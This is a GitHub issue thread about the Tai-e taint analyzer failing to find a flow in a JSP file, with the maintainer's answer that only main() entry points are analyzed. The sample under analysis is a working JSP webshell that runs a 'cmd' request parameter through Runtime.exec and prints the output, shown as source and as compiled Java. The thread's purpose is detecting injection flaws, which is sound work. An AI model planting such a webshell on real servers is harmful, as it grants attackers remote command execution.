Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Tai-e did not detect any taint flows #107

Closed
wangzitom12306 opened this issue May 8, 2024 · 6 comments
Closed

Tai-e did not detect any taint flows #107

wangzitom12306 opened this issue May 8, 2024 · 6 comments
Labels
type: question

Comments

@wangzitom12306
Copy link

wangzitom12306 commented May 8, 2024
edited
Loading

Overall Description

When I used Tai-e for taint analysis on jsp files, Tai-e did not detect any taint flows.
I'm a beginner in taint analysis, I can't figure out the reason.
any help would be greatly appreciated.

Current Behavior

Tai-e did not detect any taint flows.

Expected Behavior

Tai-e is expected to detect a taint flow in the java file.

Tai-e Version

tai-e-all-0.2.2.jar

Tai-e Arguments

java -jar tai-e-all-0.2.2.jar 
--input-classes=org.apache.jsp.shell_jsp,jakarta.servlet.ServletRequestWrapper,jakarta.servlet.ServletRequest 
-a "pta=cs:2-type;taint-config:/home/abc/taie_tools/taint-config-jsp.yml" 
-cp /home/abc/tomcat_tools/apache-tomcat-10.1.9/work/Catalina/localhost/ROOT/:/home/abc/.m2/repository/javax/servlet/javax.servlet-api/3.1.0/:/home/abc/.m2/repository/:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jasper.jar:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jakarta.servlet-api-6.0.0.jar:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jakarta.servlet.jsp-api-3.1.1.jar:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jakarta.el-api-5.0.1.jar:/home/abc/.m2/repository/org/apache/tomcat/tomcat-api/10.1.19/tomcat-api-10.1.19.jar 
-pp=True

JDK Version

JDK 17

System Environment

CentOS 7.8

Additional Information

The content of taint-config-jsp.yml is below:

sources:
  - { kind: call, method: "<jakarta.servlet.ServletRequest: java.lang.String getParameter(java.lang.String)>", index: result }
  - { kind: call, method: "<jakarta.servlet.http.HttpServletRequest: java.lang.String getParameter(java.lang.String)>", index: result }

sinks:
  - { method: "<java.lang.Runtime: java.lang.Process exec(java.lang.String)>", index: 0 }

transfers:
  - { method: "<java.lang.String: java.lang.String concat(java.lang.String)>", from: base, to: result }
  - { method: "<java.lang.String: java.lang.String concat(java.lang.String)>", from: 0, to: result }
  - { method: "<java.lang.String: char[] toCharArray()>", from: base, to: result }
  - { method: "<java.lang.String: void <init>(char[])>", from: 0, to: base }
  - { method: "<java.lang.String: void getChars(int,int,char[],int)>", from: base, to: 2 }
  - { method: "<java.lang.StringBuffer: java.lang.StringBuffer append(java.lang.String)>", from: 0, to: base }
  - { method: "<java.lang.StringBuffer: java.lang.StringBuffer append(java.lang.Object)>", from: 0, to: base }
  - { method: "<java.lang.StringBuffer: java.lang.String toString()>", from: base, to: result }
  - { method: "<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>", from: 0, to: base }
  - { method: "<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.Object)>", from: 0, to: base }
  - { method: "<java.lang.StringBuilder: java.lang.String toString()>", from: base, to: result }

The output of Tai-e is shown below:

Tai-e starts ...
Output directory: /home/abc/taie_tools/output
Writing options to /home/abc/taie_tools/output/options.yml

WARNING: sun.reflect.Reflection.getCallerClass is not supported. This will impact performance.
Writing log to /home/abc/taie_tools/output/tai-e.log
Writing analysis plan to /home/abc/taie_tools/output/tai-e-plan.yml
WorldBuilder starts ...
Warning: main class was not given!
10732 classes with 108850 methods in the world
WorldBuilder finishes, elapsed time: 3.98s
pta starts ...
Loading taint config from /home/abc/taie_tools/taint-config-jsp.yml
Cannot find source method '<jakarta.servlet.http.HttpServletRequest: java.lang.String getParameter(java.lang.String)>'
TaintConfig:
sources:
  CallSource{<jakarta.servlet.ServletRequest: java.lang.String getParameter(java.lang.String)>/result(java.lang.String)}

sinks:
  <java.lang.Runtime: java.lang.Process exec(java.lang.String)>/0

transfers:
  <java.lang.String: java.lang.String concat(java.lang.String)>: base -> result(java.lang.String)
  <java.lang.String: java.lang.String concat(java.lang.String)>: 0 -> result(java.lang.String)
  <java.lang.String: char[] toCharArray()>: base -> result(char[])
  <java.lang.String: void <init>(char[])>: 0 -> base(java.lang.String)
  <java.lang.String: void getChars(int,int,char[],int)>: base -> 2(char[])
  <java.lang.StringBuffer: java.lang.StringBuffer append(java.lang.String)>: 0 -> base(java.lang.StringBuffer)
  <java.lang.StringBuffer: java.lang.StringBuffer append(java.lang.Object)>: 0 -> base(java.lang.StringBuffer)
  <java.lang.StringBuffer: java.lang.String toString()>: base -> result(java.lang.String)
  <java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>: 0 -> base(java.lang.StringBuilder)
  <java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.Object)>: 0 -> base(java.lang.StringBuilder)
  <java.lang.StringBuilder: java.lang.String toString()>: base -> result(java.lang.String)

[Pointer analysis] elapsed time: 66.79s
Detected 0 taint flow(s):
TFGDumper starts ...
Source nodes:
Sink nodes:
Dumping /home/abc/taie_tools/output/taint-flow-graph.dot
TFGDumper finishes, elapsed time: 1.13s
-------------- Pointer analysis statistics: --------------
#var pointers:                13,7520 (insens) / 111,3371 (sens)
#objects:                     1,1700 (insens) / 2,8814 (sens)
#var points-to:               645,8989 (insens) / 6214,9618 (sens)
#static field points-to:      7775 (sens)
#instance field points-to:    314,1843 (sens)
#array points-to:             84,7341 (sens)
#reachable methods:           1,5343 (insens) / 16,4739 (sens)
#call graph edges:            8,0342 (insens) / 252,9481 (sens)
----------------------------------------
pta finishes, elapsed time: 73.89s
Tai-e finishes, elapsed time: 78.03s

Taint analysis is performed on shell_jsp.jsp:

<%@ page import="java.io.DataInputStream,java.io.InputStream,java.io.OutputStream" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        out.println("Command: " + cmd + "\n<BR>");                   
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>

I use Tomcat to convert shell_jsp.jsp into java file.
The generated java file is below:

/*
 * Generated by the Jasper component of Apache Tomcat
 * Version: Apache Tomcat/10.1.9
 * Generated at: 2024-04-03 14:53:30 UTC
 * Note: The last modified time of this file was set to
 *       the last modified time of the source file after
 *       generation to assist with modification tracking.
 */
package org.apache.jsp;

import jakarta.servlet.*;
import jakarta.servlet.http.*;
import jakarta.servlet.jsp.*;
import java.io.DataInputStream;
import java.io.InputStream;
import java.io.OutputStream;

public final class shell_jsp extends org.apache.jasper.runtime.HttpJspBase
    implements org.apache.jasper.runtime.JspSourceDependent,
                 org.apache.jasper.runtime.JspSourceImports,
                 org.apache.jasper.runtime.JspSourceDirectives {

  private static final jakarta.servlet.jsp.JspFactory _jspxFactory =
          jakarta.servlet.jsp.JspFactory.getDefaultFactory();

  private static java.util.Map<java.lang.String,java.lang.Long> _jspx_dependants;

  private static final java.util.Set<java.lang.String> _jspx_imports_packages;

  private static final java.util.Set<java.lang.String> _jspx_imports_classes;

  static {
    _jspx_imports_packages = new java.util.HashSet<>();
    _jspx_imports_packages.add("jakarta.servlet");
    _jspx_imports_packages.add("jakarta.servlet.http");
    _jspx_imports_packages.add("jakarta.servlet.jsp");
    _jspx_imports_classes = new java.util.HashSet<>();
    _jspx_imports_classes.add("java.io.OutputStream");
    _jspx_imports_classes.add("java.io.DataInputStream");
    _jspx_imports_classes.add("java.io.InputStream");
  }

  private volatile jakarta.el.ExpressionFactory _el_expressionfactory;
  private volatile org.apache.tomcat.InstanceManager _jsp_instancemanager;

  public java.util.Map<java.lang.String,java.lang.Long> getDependants() {
    return _jspx_dependants;
  }

  public java.util.Set<java.lang.String> getPackageImports() {
    return _jspx_imports_packages;
  }

  public java.util.Set<java.lang.String> getClassImports() {
    return _jspx_imports_classes;
  }

  public boolean getErrorOnELNotFound() {
    return false;
  }

  public jakarta.el.ExpressionFactory _jsp_getExpressionFactory() {
    if (_el_expressionfactory == null) {
      synchronized (this) {
        if (_el_expressionfactory == null) {
          _el_expressionfactory = _jspxFactory.getJspApplicationContext(getServletConfig().getServletContext()).getExpressionFactory();
        }
      }
    }
    return _el_expressionfactory;
  }

  public org.apache.tomcat.InstanceManager _jsp_getInstanceManager() {
    if (_jsp_instancemanager == null) {
      synchronized (this) {
        if (_jsp_instancemanager == null) {
          _jsp_instancemanager = org.apache.jasper.runtime.InstanceManagerFactory.getInstanceManager(getServletConfig());
        }
      }
    }
    return _jsp_instancemanager;
  }

  public void _jspInit() {
  }

  public void _jspDestroy() {
  }

  public void _jspService(final jakarta.servlet.http.HttpServletRequest request, final jakarta.servlet.http.HttpServletResponse response)
      throws java.io.IOException, jakarta.servlet.ServletException {

    if (!jakarta.servlet.DispatcherType.ERROR.equals(request.getDispatcherType())) {
      final java.lang.String _jspx_method = request.getMethod();
      if ("OPTIONS".equals(_jspx_method)) {
        response.setHeader("Allow","GET, HEAD, POST, OPTIONS");
        return;
      }
      if (!"GET".equals(_jspx_method) && !"POST".equals(_jspx_method) && !"HEAD".equals(_jspx_method)) {
        response.setHeader("Allow","GET, HEAD, POST, OPTIONS");
        response.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED, "JSPs only permit GET, POST or HEAD. Jasper also permits OPTIONS");
        return;
      }
    }

    final jakarta.servlet.jsp.PageContext pageContext;
    jakarta.servlet.http.HttpSession session = null;
    final jakarta.servlet.ServletContext application;
    final jakarta.servlet.ServletConfig config;
    jakarta.servlet.jsp.JspWriter out = null;
    final java.lang.Object page = this;
    jakarta.servlet.jsp.JspWriter _jspx_out = null;
    jakarta.servlet.jsp.PageContext _jspx_page_context = null;
    
    
    try {
      response.setContentType("text/html");
      pageContext = _jspxFactory.getPageContext(this, request, response,
                        null, true, 8192, true);
      _jspx_page_context = pageContext;
      application = pageContext.getServletContext();
      config = pageContext.getServletConfig();
      session = pageContext.getSession();
      out = pageContext.getOut();
      _jspx_out = out;

      out.write('\n');

    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        out.println("Command: " + cmd + "\n<BR>");
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }

      out.write('\n');
    } catch (java.lang.Throwable t) {
      if (!(t instanceof jakarta.servlet.jsp.SkipPageException)){
        out = _jspx_out;
        if (out != null && out.getBufferSize() != 0)
          try {
            if (response.isCommitted()) {
              out.flush();
            } else {
              out.clearBuffer();
            }
          } catch (java.io.IOException e) {}
        if (_jspx_page_context != null) _jspx_page_context.handlePageException(t);
        else throw new ServletException(t);
      }
    } finally {
      _jspxFactory.releasePageContext(_jspx_page_context);
    }
  }
}
@ayanamists
Copy link
Member

ayanamists commented May 23, 2024
edited
Loading

Tomcat, JBoss and other java web frameworks mainly use a dynamic way to process .jsp file. They compile .jsp to class file in memory and then loading & executing them.

Tai-e cannot automaticly generate .class file from .jsp file. Tai-e will just ignore .jsp in --input-classes. I suggest

  • compiling .jsp to .class file. See this article.
  • adding the compiled .class file to --input-classes of Tai-e's argument

@wangzitom12306
Copy link
Author

Thank you very much for your detailed instruction.

I did as you suggested, but it still did not work.

I generated .class file from .jsp file, and the name of the compiled class is org.apache.jsp.shell_jsp, which is added to the input-classes argument of Tai-e.

Moreover, the compiled .class file (org.zip) is in path /home/abc/tomcat_tools/apache-tomcat-10.1.9/work/Catalina/localhost/ROOT/, which is also added to the cp argument of Tai-e.

The arguments of Tai-e stay the same as those in the initial issue I posted:

java -jar tai-e-all-0.2.2.jar 
--input-classes=org.apache.jsp.shell_jsp,jakarta.servlet.ServletRequestWrapper,jakarta.servlet.ServletRequest 
-a "pta=cs:2-type;taint-config:/home/abc/taie_tools/taint-config-jsp.yml" 
-cp /home/abc/tomcat_tools/apache-tomcat-10.1.9/work/Catalina/localhost/ROOT/:/home/abc/.m2/repository/javax/servlet/javax.servlet-api/3.1.0/:/home/abc/.m2/repository/:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jasper.jar:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jakarta.servlet-api-6.0.0.jar:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jakarta.servlet.jsp-api-3.1.1.jar:/home/abc/tomcat_tools/apache-tomcat-10.1.9/lib/jakarta.el-api-5.0.1.jar:/home/abc/.m2/repository/org/apache/tomcat/tomcat-api/10.1.19/tomcat-api-10.1.19.jar 
-pp=True

Tai-e still did not detect any taint flows. Any help will be greatly appreciated.

@ayanamists
Copy link
Member

I cannot figure out exactly why Tai-e cannot detect this taint flow. However, I notice an output line of Tai-e

Cannot find source method '<jakarta.servlet.http.HttpServletRequest: java.lang.String getParameter(java.lang.String)>'

The <jakarta.servlet.http.HttpServletRequest: java.lang.String getParameter(java.lang.String)> is your real taint source:

       162: invokeinterface #200,  2          // InterfaceMethod jakarta/servlet/http/HttpServletRequest.getParameter:(Ljava/lang/String;)Ljava/lang/String;
       167: astore        7
       169: aload         7
       171: ifnull        279
       174: aload         4
       176: new           #204                // class java/lang/StringBuilder
       179: dup
       180: ldc           #206                // String Command:
       182: invokespecial #208                // Method java/lang/StringBuilder."<init>":(Ljava/lang/String;)V
       185: aload         7
       187: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       190: ldc           #214                // String \n<BR>
       192: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       195: invokevirtual #216                // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
       198: invokevirtual #219                // Method jakarta/servlet/jsp/JspWriter.println:(Ljava/lang/String;)V
       201: invokestatic  #222                // Method java/lang/Runtime.getRuntime:()Ljava/lang/Runtime;
       204: new           #204                // class java/lang/StringBuilder
       207: dup
       208: ldc           #228                // String cmd.exe /c
       210: invokespecial #208                // Method java/lang/StringBuilder."<init>":(Ljava/lang/String;)V
       213: aload         7
       215: invokevirtual #210                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       218: invokevirtual #216                // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
       221: invokevirtual #230                // Method java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process;
       224: astore        8
       226: aload         8
       228: invokevirtual #234                // Method java/lang/Process.getOutputStream:()Ljava/io/OutputStream;

Can you ensure the file jakarta.servlet.http.HttpServletRequest has been included in your -cp dirs?

@wangzitom12306
Copy link
Author

wangzitom12306 commented May 27, 2024
edited
Loading

Thank you very much for your quick reply.

The jar file containing class jakarta.servlet.http.HttpServletRequest is jakarta.servlet-api-6.0.0.jar, but I did NOT include jakarta.servlet-api-6.0.0.jar in my -cp dirs.

Thanks for your reminder, now I included jakarta.servlet-api-6.0.0.jar in my -cp dirs.

However, Tai-e's output stayed the same and still did not detect any taint flows.

Could you please help me check if there are any steps I did wrong? Thank you very much.

More information

I also reorganized the locations of class files and jar files to make it clear:
I put the class file of the webshell in the path /home/abc/jsp_taint_analysis/input_class_files/,

[abc@xyz jsp_taint_analysis]$   ls -lh input_class_files/
total 0
drwxr-x---. 3 abc abc 20 Apr  2 20:49 org

and also put all the jar dependencies in the path /home/abc/jsp_taint_analysis/input_jars/.

[abc@xyz jsp_taint_analysis]$   ls -lh input_jars/
total 1.1M
-rw-r--r--. 1 abc abc  87K May 27 14:20 jakarta.el-api-5.0.1.jar
-rw-r--r--. 1 abc abc 340K May 27 14:19 jakarta.servlet-api-6.0.0.jar
-rw-r--r--. 1 abc abc  70K May 27 14:20 jakarta.servlet.jsp-api-3.1.1.jar
-rw-r-----. 1 abc abc 557K May 27 14:19 jasper.jar
-rw-rw-r--. 1 abc abc  12K May 27 14:20 tomcat-api-10.1.19.jar

input_class_files, input_jars together with taint-config-jsp.yml are in the same path, namely, jsp_taint_analysis(jsp_taint_analysis.zip) .

I also changed the path of class files and jar files in Tai-e arguments correspondingly.

Tai-e's arguments

Now Tai-e's aruguments are as below:

java -jar tai-e-all-0.2.2.jar 
--input-classes=org.apache.jsp.shell_jsp,jakarta.servlet.ServletRequestWrapper,jakarta.servlet.ServletRequest 
-a "pta=cs:2-type;taint-config:/home/abc/jsp_taint_analysis/taint-config-jsp.yml" 
-cp /home/abc/jsp_taint_analysis/input_class_files/:/home/abc/jsp_taint_analysis/input_jars/jasper.jar:/home/abc/jsp_taint_analysis/input_jars/jakarta.el-api-5.0.1.jar:/home/abc/jsp_taint_analysis/input_jars/jakarta.servlet-api-6.0.0.jar:/home/abc/jsp_taint_analysis/input_jars/jakarta.servlet.jsp-api-3.1.1.jar:/home/abc/jsp_taint_analysis/input_jars/tomcat-api-10.1.19.jar 
-pp=True

Tai-e's output

Tai-e's output stayed the same and still did not detect any taint flows:

Tai-e starts ...
Output directory: /home/abc/jsp_taint_analysis/output
Writing options to /home/abc/jsp_taint_analysis/output/options.yml
WARNING: sun.reflect.Reflection.getCallerClass is not supported. This will impact performance.
Writing log to /home/abc/jsp_taint_analysis/output/tai-e.log
Writing analysis plan to /home/abc/jsp_taint_analysis/output/tai-e-plan.yml
WorldBuilder starts ...
Warning: main class was not given!
10732 classes with 108850 methods in the world
WorldBuilder finishes, elapsed time: 3.56s
pta starts ...
Loading taint config from /home/abc/jsp_taint_analysis/taint-config-jsp.yml
Cannot find source method '<jakarta.servlet.http.HttpServletRequest: java.lang.String getParameter(java.lang.String)>'
TaintConfig:
sources:
  CallSource{<jakarta.servlet.ServletRequest: java.lang.String getParameter(java.lang.String)>/result(java.lang.String)}

sinks:
  <java.lang.Runtime: java.lang.Process exec(java.lang.String)>/0

transfers:
  <java.lang.String: java.lang.String concat(java.lang.String)>: base -> result(java.lang.String)
  <java.lang.String: java.lang.String concat(java.lang.String)>: 0 -> result(java.lang.String)
  <java.lang.String: char[] toCharArray()>: base -> result(char[])
  <java.lang.String: void <init>(char[])>: 0 -> base(java.lang.String)
  <java.lang.String: void getChars(int,int,char[],int)>: base -> 2(char[])
  <java.lang.StringBuffer: java.lang.StringBuffer append(java.lang.String)>: 0 -> base(java.lang.StringBuffer)
  <java.lang.StringBuffer: java.lang.StringBuffer append(java.lang.Object)>: 0 -> base(java.lang.StringBuffer)
  <java.lang.StringBuffer: java.lang.String toString()>: base -> result(java.lang.String)
  <java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>: 0 -> base(java.lang.StringBuilder)
  <java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.Object)>: 0 -> base(java.lang.StringBuilder)
  <java.lang.StringBuilder: java.lang.String toString()>: base -> result(java.lang.String)

[Pointer analysis] elapsed time: 61.92s
Detected 0 taint flow(s):
TFGDumper starts ...
Source nodes:
Sink nodes:
Dumping /home/abc/jsp_taint_analysis/output/taint-flow-graph.dot
TFGDumper finishes, elapsed time: 0.94s
-------------- Pointer analysis statistics: --------------
#var pointers:                13,7520 (insens) / 111,3371 (sens)
#objects:                     1,1700 (insens) / 2,8814 (sens)
#var points-to:               645,8989 (insens) / 6214,9618 (sens)
#static field points-to:      7775 (sens)
#instance field points-to:    314,1843 (sens)
#array points-to:             84,7341 (sens)
#reachable methods:           1,5343 (insens) / 16,4739 (sens)
#call graph edges:            8,0342 (insens) / 252,9481 (sens)
----------------------------------------
pta finishes, elapsed time: 68.67s
Tai-e finishes, elapsed time: 72.39s

@ayanamists
Copy link
Member

ayanamists commented May 31, 2024
edited
Loading

Sorry for giving some misleading information before. The getParameter method of jakarta.servlet.http.HttpServletRequest is inherit from jakarta.servlet.ServletRequest, so <jakarta.servlet.http.HttpServletRequest: java.lang.String getParameter(java.lang.String)> cannot be resolved, and it's ok.

The real problem here is that Tai-e can only set entrypoint to main() method, and your org.apache.jsp.shell_jsp will not be analyzed by just adding to --input-classes args (this just bringorg.apache.jsp.shell_jsp class to possible analysis scope of Tai-e).

You can solve this problem by injecting a new plugin to Tai-e. See here and the blog.

@wangzitom12306
Copy link
Author

Thank you very much for your instruction. I will try injecting a new plugin as you suggested.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
type: question
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ayanamists @wangzitom12306